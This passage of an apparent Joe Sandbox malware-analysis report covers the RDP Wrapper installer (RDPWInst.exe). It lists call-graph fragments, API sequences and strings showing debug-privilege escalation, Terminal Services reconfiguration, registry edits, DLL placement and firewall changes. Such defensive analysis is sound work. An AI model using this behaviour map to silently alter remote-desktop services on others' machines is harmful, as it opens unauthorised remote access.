22540->23385 22546 43d170 22541->22546 22549 43d465 22542->22549 22550 43cc44 81 API calls 22543->22550 22551 404cdc 14 API calls 22544->22551 22553 40f9d8 15 API calls 22546->22553 22547 43d50c 22554 43d543 22547->22554 22563 43c45c 17 API calls 22547->22563 22557 43cc44 81 API calls 22549->22557 22558 43d3eb 22550->22558 22559 43d1b4 22551->22559 22552 43d2fb 22560 43d373 22552->22560 22593 43d2ff 22552->22593 22561 43d17b 22553->22561 22554->22127 22555 43c45c 17 API calls 22565 43d4e8 22555->22565 22556 43d237 22566 43d23b 22556->22566 22567 43d29a 22556->22567 22568 43d472 22557->22568 22569 43d40c 22558->22569 22585 406c44 14 API calls 22558->22585 22570 4042f8 14 API calls 22559->22570 22564 43c45c 17 API calls 22560->22564 22562 407450 15 API calls 22561->22562 22571 43d18e 22562->22571 22572 43d51f 22563->22572 22573 43d380 22564->22573 22574 40f77c 4 API calls 22565->22574 22590 43c45c 17 API calls 22566->22590 22576 407450 15 API calls 22567->22576 22575 43d493 22568->22575 22591 406c44 14 API calls 22568->22591 22577 43d42d 22569->22577 22595 406c44 14 API calls 22569->22595 22578 43d1b9 22570->22578 22579 407450 15 API calls 22571->22579 22580 40f77c 4 API calls 22572->22580 22581 40f9d8 15 API calls 22573->22581 22584 43d4f0 22574->22584 22582 43d4b4 22575->22582 22600 406c44 14 API calls 22575->22600 22586 43d2a9 22576->22586 22596 406c44 14 API calls 22577->22596 22577->22606 22583 43c45c 17 API calls 22578->22583 22587 43d194 22579->22587 22588 43d527 22580->22588 22589 43d38b 22581->22589 22582->22606 22612 406c44 14 API calls 22582->22612 22592 43d1c6 22583->22592 22584->22547 22603 43c45c 17 API calls 22584->22603 22585->22569 22594 404cdc 14 API calls 22586->22594 22597 404cdc 14 API calls 22587->22597 22588->22554 22608 43c45c 17 API calls 22588->22608 22598 406fe0 15 API calls 22589->22598 22599 43d252 22590->22599 22591->22575 22601 40f9d8 15 API calls 22592->22601 22602 43c45c 17 API calls 22593->22602 22604 43d2ae 22594->22604 22595->22577 
22596->22606 22607 43d199 22597->22607 22609 43d398 22598->22609 22610 40f9d8 15 API calls 22599->22610 22600->22582 22611 43d1d1 22601->22611 22613 43d324 22602->22613 22614 43d501 22603->22614 22605 4042f8 14 API calls 22604->22605 22615 43d298 22605->22615 22606->22547 22606->22555 22616 4042f8 14 API calls 22607->22616 22617 43d538 22608->22617 23395 43cc44 22609->23395 22619 43d25d 22610->22619 22620 407450 15 API calls 22611->22620 22612->22606 22621 40f9d8 15 API calls 22613->22621 22622 43cc44 81 API calls 22614->22622 22615->22511 22623 43d19e 22616->22623 22624 43cc44 81 API calls 22617->22624 22625 4070a0 15 API calls 22619->22625 22626 43d1e4 22620->22626 22627 43d32f 22621->22627 22622->22547 22623->22511 22623->22512 22624->22554 22628 43d26d 22625->22628 22629 407450 15 API calls 22626->22629 22630 4070a0 15 API calls 22627->22630 22634 407450 15 API calls 22628->22634 22631 43d1ea 22629->22631 22632 43d33f 22630->22632 22633 404cdc 14 API calls 22631->22633 22638 407450 15 API calls 22632->22638 22635 43d1ef 22633->22635 22636 43d286 22634->22636 22637 4042f8 14 API calls 22635->22637 22639 407450 15 API calls 22636->22639 22640 43d1f4 22637->22640 22641 43d358 22638->22641 22642 43d28e 22639->22642 23413 40632c 10 API calls 22640->23413 22644 407450 15 API calls 22641->22644 22645 404cdc 14 API calls 22642->22645 22646 43d360 22644->22646 22647 43d293 22645->22647 22648 404cdc 14 API calls 22646->22648 22650 4042f8 14 API calls 22647->22650 22649 43d365 22648->22649 22651 4042f8 14 API calls 22649->22651 22650->22615 22651->22513 22653 43c5d1 22652->22653 22654 43c5bb 22652->22654 23549 4387a8 18 API calls 22653->23549 23548 4387ec 18 API calls 22654->23548 22657 43c5cc 22658 438890 18 API calls 22657->22658 22659 43c5ed 22658->22659 23526 4389d8 22659->23526 22661 43c5fc 22662 43c600 GetLastError 22661->22662 22663 43c63c 22661->22663 22664 407450 15 API calls 22662->22664 23542 43937c 22663->23542 22666 43c61c 22664->22666 22667 407dec 14 API 
Call-graph edge list for the remaining functions of the dump (the rendered graph is not recoverable as text; the node-to-node edges are omitted here). What survives is the Win32 API sequence per function, which is the part a reviewer needs:
• 43bf27: GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueW (43bfa3), AdjustTokenPrivileges (43bffa); each failure path goes through GetLastError (43bf4c, 43bfaf, 43c031) and the error-string helpers 40f220/407184. This is a privilege-adjustment routine on the current process token.
• 43c1da–43c264: TerminateProcess (43c216), CloseHandle, GetLastError, with the same error-string helpers (407450, 407dec, 404cdc, 4042f8, 40632c).
• 43b5e1: OpenSCManagerW, OpenServiceW (43b61a), StartServiceW (43b642); on failure GetLastError, then Sleep and a second StartServiceW (43b669); CloseServiceHandle twice (43b6a6). Errors are reported through 43b48c.
• 43ae7c: OpenSCManagerW, OpenServiceW (43aed4), QueryServiceConfigW (43af21), then after a call to helper 4041b0 a second QueryServiceConfigW (43af5b); CloseServiceHandle twice on both the success (43afd1) and error (43af7b, with GetLastError) paths.
• 43b1f5: OpenSCManagerW, OpenServiceW (43b24d), ChangeServiceConfigW (43b297), CloseServiceHandle twice (43b2f7; 43b2b4 with GetLastError on failure).
• 43e7e6–43e818: alternating calls to 43b1a8 (the ChangeServiceConfigW routine) and 43ae28 (the QueryServiceConfigW routine).
• 43e879–43eb1f: repeated sequences of the registry helpers 4389d8 (RegOpenKeyExW at 438a51 or RegCreateKeyExW at 438a8b), 4396b8 and 438860 (RegFlushKey at 438870, RegCloseKey at 438876), each with a GetLastError error path.
• 438b84, 438bfa, 438c6b: three chained RegOpenKeyExW calls; 439278 and 439916: RegQueryValueExW; 4398a9: RegSetValueExW; 439a0a: RegOpenKeyExW with RegCloseKey at 439d5e; 43c4f0: ExpandEnvironmentStringsW.
• 42fb48: FindResourceW, LoadResource (42fb74), SizeofResource and LockResource (42fb8e); 43dc79: LoadLibraryExW, FindResourceW (43dc85), LoadResource (43dc95), FreeLibrary (43dca0). Both read embedded resources.
• 43c378: CreateProcessW, then CloseHandle, WaitForSingleObject, CloseHandle (43c3b7); GetLastError (43c384) on failure.
• File handling: CreateFileW (40f689, 40f5f8, reached from 42f58c), CreateDirectoryW (40fb68), GetFileAttributesW (40f7ce, 40f787), FindFirstFileW/FindClose (40f73c); the runtime file-open routine at 4047a5 uses CreateFileW, GetStdHandle (404857), GetFileSize (4047d1), SetFilePointer (4047e5, 404836), ReadFile (404801), SetEndOfFile (40484b), GetFileType (40489c), CloseHandle (4048b7) and GetLastError (4048cb).
• Runtime/support: GetVersionExW (414698), GetModuleHandleW (415b40), VirtualAlloc (402990), InterlockedCompareExchange (416ea0, 416270), SysFreeString (4068c4, 4068ca, 4068dc).

                                                    Control-flow Graph

                                                    Basic-block graph of the function at 43b7d4 (rendered graph omitted; the executed/not-executed colouring is not recoverable as text). Recoverable structure, in block order:
                                                    • 43b7f8: OpenSCManagerW; on failure 43b80c GetLastError and the error-string helpers (407450, 407dec, 404cdc, 4042f8, 40632c).
                                                    • 43b848: first EnumServicesStatusExW after the 408334/40816c/404a04 buffer helpers; 43b8af GetLastError; 43b8fe: second EnumServicesStatusExW with the same helpers in between, which is consistent with the usual size query followed by a filled call. 43b8be and 43b95c are the error paths (CloseServiceHandle, GetLastError, error strings).
                                                    • 43b99e: CloseServiceHandle, then the loop 43b9ba–43ba20 walks the returned entries with the string helpers 406d9c, 40e50c and 4072a4.
                                                    • 43ba54: either the error path 43ba5a (error strings) or 43ba7d, which calls 43b1a8 (ChangeServiceConfigW) followed by 43b58c (StartServiceW) and loops back to 43b7f8.
                                                    • 43ba9f–43bc5c: result-string construction (407450, 407dec, 404cdc, 4042f8, 408334, 40816c), a second walk over the entries at 43bb00–43bb7c, and cleanup (406bf0, 407184, 406be8, 406be0, 408340).
                                                    APIs
                                                    • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005,00000000,0043BC5D,?,?,?,00447324,00000000,00000000,?,00443F06,00000000,00443FB2), ref: 0043B801
                                                    • GetLastError.KERNEL32(00000000,ServicesActive,00000005,00000000,00000000,00000000,00000030,00000003,?,00000000,?,?,?,00000000), ref: 0043B80C
                                                    • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,?,00000000,?,?,?,00000000), ref: 0043B8A2
                                                    • GetLastError.KERNEL32(00000000,00000000,00000030,00000003,?,00000000,00000000,?,?,00000000,00000000), ref: 0043B8AF
                                                    • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000030,00000003,?,00000000,00000000,?,?,00000000,00000000), ref: 0043B8BF
                                                    • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0043B953
                                                    • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000030,00000003,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0043B95D
                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,00000030,00000003,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0043B962
                                                    • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000030,00000003,?,00000000,?,?,?,00000000), ref: 0043B99F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseErrorHandleLastService$EnumServicesStatus$ManagerOpen
                                                    • String ID: $sD$ServicesActive$TermService$[*] No shared services found.$[*] Shared services found: $[+] TermService found (pid $[-] EnumServicesStatusEx error (code $[-] Failed to set up TermService. Unknown error.$[-] OpenSCManager error (code $[-] TermService not found.
                                                    • API String ID: 2770857348-2470772499
                                                    • Opcode ID: bdcf77957b8ef17359aa2c2f35968ba8930b31ce6167e8ba152cfdf214f6386e
                                                    • Instruction ID: fb74497bf6b161f68451673f63bd6f491a4d1cb4b87c09a1aee9fb4a9c308b37
                                                    • Opcode Fuzzy Hash: bdcf77957b8ef17359aa2c2f35968ba8930b31ce6167e8ba152cfdf214f6386e
                                                    • Instruction Fuzzy Hash: A1C15074A041049BD710FBB9DD42B5E76A5EB89308F11507FF640BB292CB3CAD058BAE

                                                    Control-flow Graph

                                                    APIs
                                                    • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001,00000000,0043B319,?,?,-00000001,00000000,?,?,0043BA8C,00000000,00000000,00000000,00000030), ref: 0043B1FE
                                                    • GetLastError.KERNEL32(00000000,ServicesActive,00000001,00000000,0043B319,?,?,-00000001,00000000,?,?,0043BA8C,00000000,00000000,00000000,00000030), ref: 0043B209
                                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000002,00000000,ServicesActive,00000001,00000000,0043B319,?,?,-00000001,00000000,?,?,0043BA8C,00000000), ref: 0043B24F
                                                    • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000002,00000000,ServicesActive,00000001,00000000,0043B319,?,?,-00000001,00000000,?,?,0043BA8C), ref: 0043B25B
                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,00000002,00000000,ServicesActive,00000001,00000000,0043B319,?,?,-00000001,00000000,?,?,0043BA8C), ref: 0043B260
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLastOpenService$CloseHandleManager
                                                    • String ID: $sD$...$ServicesActive$[*] Configuring $[-] ChangeServiceConfig error (code $[-] OpenSCManager error (code $[-] OpenService error (code
                                                    • API String ID: 48634454-398082305
                                                    • Opcode ID: 3b1e76f9c62e1046217b3bbe464b976e02e2f47daf27cfab7c11257a6428595c
                                                    • Instruction ID: ec3001641675e227f0f71ffcc16d431bf32a474d6a16b1f18b89db5f0a2815a5
                                                    • Opcode Fuzzy Hash: 3b1e76f9c62e1046217b3bbe464b976e02e2f47daf27cfab7c11257a6428595c
                                                    • Instruction Fuzzy Hash: 32318DA4708210AAE611B7B68D43B2F6598DF8D308F12917BB614A6693CB3C9D0195BF

                                                    Control-flow Graph

                                                    APIs
                                                    • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001,00000000,0043B6CE,?,00000000), ref: 0043B5EA
                                                    • GetLastError.KERNEL32(?,00000000,ServicesActive,00000001,00000000,0043B6CE,?,00000000), ref: 0043B5F9
                                                      • Part of subcall function 0043B48C: CloseServiceHandle.ADVAPI32(00000000,00000000,0043B52C,?,00000000,?,?,0043B6A3,?,00000000,00000000,?,00000000,00000000,00000010,00000000), ref: 0043B4BC
                                                      • Part of subcall function 0043B48C: CloseServiceHandle.ADVAPI32(00000000,00000000,0043B52C,?,00000000,?,?,0043B6A3,?,00000000,00000000,?,00000000,00000000,00000010,00000000), ref: 0043B4D1
                                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000010,00000000,ServicesActive,00000001,00000000,0043B6CE,?,00000000), ref: 0043B61F
                                                    • GetLastError.KERNEL32(?,00000000,00000000,00000010,00000000,ServicesActive,00000001,00000000,0043B6CE,?,00000000), ref: 0043B62E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Service$CloseErrorHandleLastOpen$Manager
                                                    • String ID: $sD$...$OpenSCManager$OpenService$ServicesActive$StartService$[*] Starting
                                                    • API String ID: 2257214823-3855835416
                                                    • Opcode ID: 55f0df0e7310880f6e7cb70b762c89182bbbe75636a3247ae01688996091d268
                                                    • Instruction ID: 0e693e6e1cec2ac2fe46a8ff9d209bc722a6061919d6bcedfcc5fc96e321ed9b
                                                    • Opcode Fuzzy Hash: 55f0df0e7310880f6e7cb70b762c89182bbbe75636a3247ae01688996091d268
                                                    • Instruction Fuzzy Hash: 6C313471A04208AEDB10FBB68842B5F77E8DB4C715F60947BF614E7283DB7C9940869E

                                                    Control-flow Graph

                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BF3D
                                                    • OpenProcessToken.ADVAPI32(00000000,00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BF43
                                                    • GetLastError.KERNEL32(00000000,00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BF4C
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,?), ref: 0043BFA6
                                                    • GetLastError.KERNEL32(00000000,00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BFAF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLastProcess$CurrentLookupOpenPrivilegeTokenValue
                                                    • String ID: $sD$[-] AdjustTokenPrivileges error (code $[-] LookupPrivilegeValue error (code $[-] OpenProcessToken error (code
                                                    • API String ID: 1401577899-1200187420
                                                    • Opcode ID: 4f72a90d0289c3e65b588dbff969bb89f75e63602ae5a34113a3e67517c1ed7a
                                                    • Instruction ID: 40249df541e28cb1c3cbeffac081f98f3db748ff3bf72c69c2aa91bf02ef4f1c
                                                    • Opcode Fuzzy Hash: 4f72a90d0289c3e65b588dbff969bb89f75e63602ae5a34113a3e67517c1ed7a
                                                    • Instruction Fuzzy Hash: E5412475E00218AFDB04EBE5DD81A9EB7B8EF49704F11407BF500F2291DA789D059B6A
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,?,?,0044BFA8,00447324,0043DEB8,00000000,0043E150,?,?,00447324), ref: 0043DC7A
                                                    • FindResourceW.KERNEL32(00000000,00000001,00000010,00000000,00000000,00000002,?,?,0044BFA8,00447324,0043DEB8,00000000,0043E150,?,?,00447324), ref: 0043DC8A
                                                    • LoadResource.KERNEL32(00000000,00000000,00000000,00000001,00000010,00000000,00000000,00000002,?,?,0044BFA8,00447324,0043DEB8,00000000,0043E150), ref: 0043DC97
                                                    • FreeLibrary.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000010,00000000,00000000,00000002,?,?,0044BFA8,00447324,0043DEB8,00000000,0043E150), ref: 0043DCF5
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LibraryLoadResource$FindFree
                                                    • String ID:
                                                    • API String ID: 3272429154-0
                                                    • Opcode ID: 15bd354d354d96cc7854a01dd3595191e335ff94095102c971dcd749e24b3d64
                                                    • Instruction ID: b141022db8bc2a2b6abfb651a233e3798db1869765cd13709d0418182ea328c4
                                                    • Opcode Fuzzy Hash: 15bd354d354d96cc7854a01dd3595191e335ff94095102c971dcd749e24b3d64
                                                    • Instruction Fuzzy Hash: 9411E3273067445AC721DA268A81EDF3B169FC1340F09C1A6F9009F396E679C901C39A
                                                    APIs
                                                    • GetUserDefaultUILanguage.KERNEL32(00000003,?,?,00000000,?,00409584,?,?,?,00000000,00000105,00000000,004095BB,?,00437408), ref: 004093DC
                                                    • GetLocaleInfoW.KERNEL32(?,00000003,?,?,00000000,?,00409584,?,?,?,00000000,00000105,00000000,004095BB,?,00437408), ref: 004093E5
                                                      • Part of subcall function 004092D8: FindFirstFileW.KERNEL32(?,?,00000000), ref: 004092F2
                                                      • Part of subcall function 004092D8: FindClose.KERNEL32(00000000,?,?,00000000), ref: 00409302
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                    • String ID:
                                                    • API String ID: 3216391948-0
                                                    • Opcode ID: a26faab687ad10f6bf339373f2b132671eb58a1d7de5f88059ad0fc6f14c2cf4
                                                    • Instruction ID: 6b7a5b6d94b1cbf22f3d71e7f3d695f59a60f48835f9eba26b4dd19c2a33d547
                                                    • Opcode Fuzzy Hash: a26faab687ad10f6bf339373f2b132671eb58a1d7de5f88059ad0fc6f14c2cf4
                                                    • Instruction Fuzzy Hash: 58F05E752412086FDB00DE9DD888DA677DCBF18368F4044AAF94CDF382C679EC408B64
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?,00000000), ref: 004092F2
                                                    • FindClose.KERNEL32(00000000,?,?,00000000), ref: 00409302
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Find$CloseFileFirst
                                                    • String ID:
                                                    • API String ID: 2295610775-0
                                                    • Opcode ID: 6b2b30213d2c3205255c74374c6d0cedf81d32bff8ef7784ed5e0124d95693a3
                                                    • Instruction ID: eb757cbb51915ae52a623e93d498bac1ae70d661531f8aa58739ae681ecdb70c
                                                    • Opcode Fuzzy Hash: 6b2b30213d2c3205255c74374c6d0cedf81d32bff8ef7784ed5e0124d95693a3
                                                    • Instruction Fuzzy Hash: B8D02B7250010823CA2099BC8CC9E9F734C5B05234F0803677DA8E33D1FA35D9100198
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    • Opcode ID: dcf78b23b46585e2dba9b3fc2d517005d4dfc9a18e6822ae8d97214c6ea3767e
                                                    • Instruction ID: dea72ce09e15e74ad366377f5463cd755b9610de14ca7f4492471b38ec8a052a
                                                    • Opcode Fuzzy Hash: dcf78b23b46585e2dba9b3fc2d517005d4dfc9a18e6822ae8d97214c6ea3767e
                                                    • Instruction Fuzzy Hash: 12B012106085015BC908E73D4D4744B31C01A40524FC40234745CE62C2F65DCAA546DF

                                                    Control-flow Graph

                                                    • Control-flow graph of the function at 0044373C (legend: Executed / Not Executed; rendered graph data not reproduced here)
                                                    Strings
                                                    • [*] Terminating service..., xrefs: 00443BE3, 00443D53, 00443F08
                                                    • LpD, xrefs: 0044374F
                                                    • -u -k uninstall wrapper and keep settings, xrefs: 0044393B
                                                    • only >= 6.0 (Vista, Server 2008 and newer) are supported., xrefs: 004439D4
                                                    • [*] Uninstalling..., xrefs: 00443D0F
                                                    • [+] Done., xrefs: 00443F83
                                                    • -r force restart Terminal Services, xrefs: 00443951
                                                    • USAGE:, xrefs: 00443878
                                                    • [*] Configuring service library..., xrefs: 00443BAD
                                                    • [*] Installing..., xrefs: 00443AE5
                                                    • SeDebugPrivilege, xrefs: 00443BF7, 00443D67, 00443F1C
                                                    • to be bound by all the terms and conditions of the license agreement., xrefs: 00443A8D
                                                    • - By using all or any portion of this software, you are agreeing, xrefs: 00443A77
                                                    • -w get latest update for INI file, xrefs: 0044390F
                                                    • %SystemRoot%\system32\rdpwrap.dll, xrefs: 00443B1A
                                                    • RDP Wrapper Library v1.6.2, xrefs: 00443777
                                                    • [+] Successfully installed., xrefs: 00443CA2
                                                    • Installer v2.5, xrefs: 0044378D
                                                    • -i -o online install mode (loads latest INI file), xrefs: 004438F9
                                                    • [*] Extracting files..., xrefs: 00443B4F
                                                    • [*] Removing files..., xrefs: 00443D87
                                                    • [*] Checking for updates..., xrefs: 00443EB2
                                                    • [*] RDP Wrapper Library is not installed., xrefs: 00443CEF, 00443E92
                                                    • [*] Configuring registry..., xrefs: 00443C68, 00443E0F
                                                    • $sD, xrefs: 00443761
                                                    • -i install wrapper to Program Files folder (default), xrefs: 004438CD
                                                    • -i -s install wrapper to System32 folder, xrefs: 004438E3
                                                    • [*] Checking dependencies..., xrefs: 00443BC8
                                                    • RDPWInst.exe [-l|-i[-s][-o]|-w|-u[-k]|-r], xrefs: 0044388E
                                                    • -u uninstall wrapper, xrefs: 00443925
                                                    • [-] Unsupported Windows version:, xrefs: 004439BE
                                                    • - To read the license agreement, run the installer with -l parameter., xrefs: 00443AA3
                                                    • -l display the license agreement, xrefs: 004438B7
                                                    • do not use the software., xrefs: 00443ACF
                                                    • %ProgramFiles%\RDP Wrapper\rdpwrap.dll, xrefs: 00443B2B
                                                    • [*] RDP Wrapper Library is already installed., xrefs: 00443A41
                                                    • [+] Successfully uninstalled., xrefs: 00443E57
                                                    • [-] Unsupported processor architecture., xrefs: 004439F8
                                                    • Copyright (C) Stas'M Corp. 2017, xrefs: 004437A3
                                                    • - If you do not agree to any terms of the license agreement,, xrefs: 00443AB9
                                                    • [*] Restarting..., xrefs: 00443EED
                                                    • [*] Notice to user:, xrefs: 00443A61
                                                    • license, xrefs: 00443989
                                                    • [*] Configuring firewall..., xrefs: 00443C85, 00443E2C
                                                    • TermService, xrefs: 00443C52, 00443DDD, 00443F77
                                                    • [*] Resetting service library..., xrefs: 00443D38
                                                    Memory Dump Source
